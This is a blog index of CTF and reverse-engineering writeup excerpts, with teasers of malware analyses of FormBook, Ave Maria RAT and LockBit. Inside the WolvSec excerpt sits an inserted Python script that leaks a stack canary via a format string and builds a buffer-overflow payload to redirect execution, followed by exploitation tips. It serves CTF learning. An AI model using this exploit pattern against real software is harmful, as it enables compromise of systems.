Author: Chan Jin Hao
-
Angstrom Rev Writeups
I’ve decided to fully focus on Rev and Web for CTFs now, as I find Pwning too magical, and not really “useful” to me. Anyhoo, here are some reversing writeups from Angstrom CTF! Dyn: Running the code, we see that it gets the flag as an input. Stepping through the code, it tries to unwrap 32 characters, […]
-
247CTF
Here are some writeups for 247CTF, which are mostly web challenges. ACID: We’re given a page that has two accounts. You can transfer funds between the two accounts with the parameters ?to=1&from=2&amount=1. To get the flag, you require more than the total available funds at the start, which is 247. If we transfer the funds […]
-
Midnight Sun CTF Gambler
This is one of the hardest CTFs I’ve been in. My team did really well to qualify for the finals in Sweden, and I wish them all the best as I will not be joining them. The Gambler: This was a .NET binary, so we could use DNSpy to inspect the full source code. In […]
-
Winja CTF Reverse Engineering
Honestly, these were very easy CTF rev challenges. One of them had a flaw in that there was more than one possible flag, while another leaked the whole flag outright with ltrace. So this is the only writeup worth writing, even though it was extremely easy. Matriarcado: Opening the binary, we see that […]
-
WolvSec CTF: pwning canaries
Another writeup for a pwn CTF challenge! In this challenge, we need to leak the canary value via a format string, then do a buffer overflow to change the return address to the desired function. The buffer for us to overflow is 16 characters long. It first reads in data with a format string, and prints […]
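The two-stage attack the excerpt describes (leak the canary through the format string, then overflow past the 16-byte buffer with the canary written back in place and the return address replaced) as an added example. This is not the writeup's own exploit and nothing here comes from the challenge binary: the leaked values, the canary, the saved rbp and the target function address 0x401196 are constructed sample data, and the frame layout [buffer][canary][saved rbp][return address] is the usual gcc x86-64 layout with -fstack-protector, assumed here rather than taken from the page.

```python
import struct

# Constructed sample (not from the original challenge): what a %p-style leak of
# eight stack slots might print back. The sixth value plays the canary.
SAMPLE_LEAK = ("0x7ffd2c3f1a40.0x7f6a5e2b2980.(nil).0x1."
               "0x4141414141414141.0x9f3c2b1a7e5d4c00.0x7ffd2c3f1b10.0x401196")

BUF_SIZE = 16          # the 16-byte buffer described in the writeup
QWORD = 8              # x86-64 stack slot width (assumption: 64-bit target)


def leak_format(index):
    """Format string that prints one stack slot via direct parameter access.
    '%6$p' is 4 bytes, so it fits comfortably in a 16-byte buffer."""
    return "%{}$p".format(index)


def parse_leak(line):
    """Convert the dot-separated %p output into integers; '(nil)' becomes 0."""
    return [0 if tok == "(nil)" else int(tok, 16)
            for tok in line.strip().split(".")]


def find_canary(values):
    """Pick the slot that looks like a glibc x86-64 stack canary: a 64-bit value
    whose lowest byte is 0x00 (so string reads stop at it) and that is not a
    stack/libc pointer (0x7f..) or a small value such as a text address.
    Returns (1-based %p index, value)."""
    for i, v in enumerate(values, start=1):
        if v > 0xFFFFFFFF and (v & 0xFF) == 0 and (v >> 40) != 0x7F:
            return i, v
    raise ValueError("no canary-looking value in leak")


def build_payload(canary, saved_rbp, target_addr, buf_size=BUF_SIZE):
    """Second-stage overflow. Frame layout assumed for gcc on x86-64 with
    -fstack-protector: [buffer][canary][saved rbp][return address].
    The leaked canary is written back in place so the epilogue check passes."""
    return (b"A" * buf_size
            + struct.pack("<Q", canary)
            + struct.pack("<Q", saved_rbp)
            + struct.pack("<Q", target_addr))


def payload_layout(payload, buf_size=BUF_SIZE):
    """Split a payload back into its fields, handy for sanity-checking offsets."""
    off = buf_size
    canary, rbp, ret = struct.unpack("<QQQ", payload[off:off + 3 * QWORD])
    return {"canary": canary, "saved_rbp": rbp, "ret": ret}


if __name__ == "__main__":
    idx, canary = find_canary(parse_leak(SAMPLE_LEAK))
    print("leak with", leak_format(idx), "-> canary", hex(canary))
    win = 0x401196                 # assumed address of the target function
    p = build_payload(canary, 0x7ffd2c3f1b10, win)
    print(payload_layout(p))
```

Two practical caveats: the canary's low byte is zero on purpose, which is why it must be leaked with `%p` rather than `%s`, and the exact `%N$p` index has to be found by trial against the real binary. Also, jumping straight to a function's first instruction leaves the stack misaligned by 8 on x86-64, which can crash on a `movaps` inside the target; if that happens, return to a `ret` gadget first or to the address just after the function's `push rbp`.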
-
WolvSec CTF
I briefly participated in a CTF hosted by WolvSec here: https://ctf.wolvseccon.org/. This post is going to look at a “Medium” difficulty Reverse Engineering problem! n33dl3: When we run the file, it prints a single statement before terminating. Firing up this binary in Ghidra, we see a deep level of nested function calls; however, they […]
-
RE: Crackme Guess the Password
https://crackmes.one/crackme/60906d5833c5d458ce0ec80b I’ve been doing plenty of crackmes as a way to improve my RE skills, although I do stay away from keygen challenges as I don’t find them particularly interesting. Instead, I’m attempting those that require you to key in the right username or password. This write-up is about a pretty interesting and challenging […]
-
FormBook / AgentTesla
Today we’re gonna look at a sample of FormBook malware, which contains AgentTesla within it. It features things such as hiding an EXE within an EXE and installing a persistent backdoor in the system. Source: https://bazaar.abuse.ch/sample/35147128936c2e79548e5c0a2bbd70cd5a29c1b01dfa1ac2515fa5becb7efa6d/#intel First DNSpy Analysis: When we run the exe file through DNSpy, it looks to be building a simple form. […]
-
Ave Maria RAT (Loader?)
The sample we’re analyzing is part of the Ave Maria RAT malware family, but judging from its simple functions, perhaps it’s simply a loader to download the more complete malware. The file disguises itself as a PDF file with its icon, but in actuality it’s a .NET program. We fire up DNSpy and load it […]
-
RE Series #10: LockBit ELF
After doing a substantial number of RE challenges, I decided to analyze real malware to see if what I’ve learnt is actually useful, and I have to say, I think it really helped! In this post, I’ll be dissecting the initial portions of the Linux variant of LockBit. Basic Information: The binary on its own […]